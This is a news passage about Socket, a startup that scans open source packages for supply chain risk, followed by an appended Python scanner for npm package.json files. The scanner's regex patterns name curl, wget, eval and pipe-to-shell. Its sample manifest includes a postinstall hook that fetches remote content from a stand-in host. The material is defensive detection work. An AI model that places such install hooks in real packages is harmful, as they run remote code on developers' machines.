It’s too hard for developers to do the right thing, according to https://www.linkedin.com/in/feross/, an avid open source maintainer and founder of Socket, a startup focused on the security of open source components. Socket has found ChatGPT a good fit for ferreting out the types of vulnerabilities those components contain.

The Bay Area startup Socket detects more than https://socket.dev/npm/issue of supply chain risk in open source code.

“We analyze every open source package that’s published to all the major registries, so npm for JavaScript, PyPI for Python.

And then when the developer goes to choose what open source code they want to rely on …
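To make concrete what "analyzing a package for supply chain risk" can look like, here is an added example, not code from the article and not Socket's own analysis: a small Python scanner that reads one npm package.json and flags three well-known risk signals. The signal list (lifecycle install hooks, script bodies that fetch or eval code, and dependencies that bypass the registry) and the regular expressions are my assumptions about what is worth flagging; the manifest is constructed for the example and points at an `.invalid` host so it never resolves.

```python
import json
import re

# npm runs these lifecycle hooks automatically during `npm install`, so a
# package that defines them executes arbitrary code on the developer's machine.
# (Assumed signal for this example; not Socket's signal list.)
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Script bodies that fetch remote content, pipe it to a shell, or evaluate
# inline code are a common shape for install-time droppers. (Assumed pattern.)
SUSPICIOUS_SCRIPT = re.compile(
    r"\b(curl|wget)\b|node\s+-e\b|\beval\b|base64\s+-d|\|\s*(sh|bash)\b"
)

# Dependency specs that are git URLs, tarball URLs, local paths, or GitHub
# shorthand bypass the registry entirely and cannot be audited by version.
# (Assumed pattern.)
NON_REGISTRY_SPEC = re.compile(
    r"^(git\+|git://|https?://|file:|github:|[\w.-]+/[\w.-]+(#.*)?$)"
)


def scan_manifest(manifest: dict) -> list[str]:
    """Return human-readable risk findings for one parsed package.json."""
    findings = []
    scripts = manifest.get("scripts") or {}

    # Signal 1: any lifecycle hook that runs code at install time.
    for hook in INSTALL_HOOKS:
        if hook in scripts:
            findings.append(
                f"install script: '{hook}' runs `{scripts[hook]}` during npm install"
            )

    # Signal 2: any script (install hook or not) that fetches or evals code.
    for name, body in scripts.items():
        if SUSPICIOUS_SCRIPT.search(body):
            findings.append(f"suspicious script: '{name}' fetches or evals code: `{body}`")

    # Signal 3: dependencies resolved from somewhere other than the registry.
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for dep, spec in (manifest.get(section) or {}).items():
            if NON_REGISTRY_SPEC.match(spec):
                findings.append(f"non-registry dependency: {dep}@{spec} in {section}")

    return findings


def scan_manifest_text(text: str) -> list[str]:
    """Convenience wrapper: scan a package.json given as raw JSON text."""
    return scan_manifest(json.loads(text))


# Constructed sample manifest for the example (not a real package).
SAMPLE_MANIFEST_TEXT = """
{
  "name": "example-widget",
  "version": "1.0.3",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "node -e \\"require('https').get('https://example.invalid/p', r => r.pipe(process.stdout))\\""
  },
  "dependencies": {
    "lodash": "^4.17.21",
    "left-pad-ng": "git+https://example.invalid/someone/left-pad-ng.git"
  }
}
"""

# Constructed clean manifest: registry-only dependencies, no install hooks.
CLEAN_MANIFEST_TEXT = """
{
  "name": "plain-lib",
  "version": "2.0.0",
  "scripts": {"test": "node test.js"},
  "dependencies": {"semver": "^7.5.4"}
}
"""

if __name__ == "__main__":
    for line in scan_manifest_text(SAMPLE_MANIFEST_TEXT):
        print(line)
```

Run against the constructed sample this reports three findings: the `postinstall` hook itself, the same script again because its body invokes `node -e` to pull remote content, and the git-URL dependency; the clean manifest reports nothing. A registry-scale scanner would run this kind of check on every published version and also diff the manifest against the previous release, so that a hook appearing for the first time in a patch release stands out.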
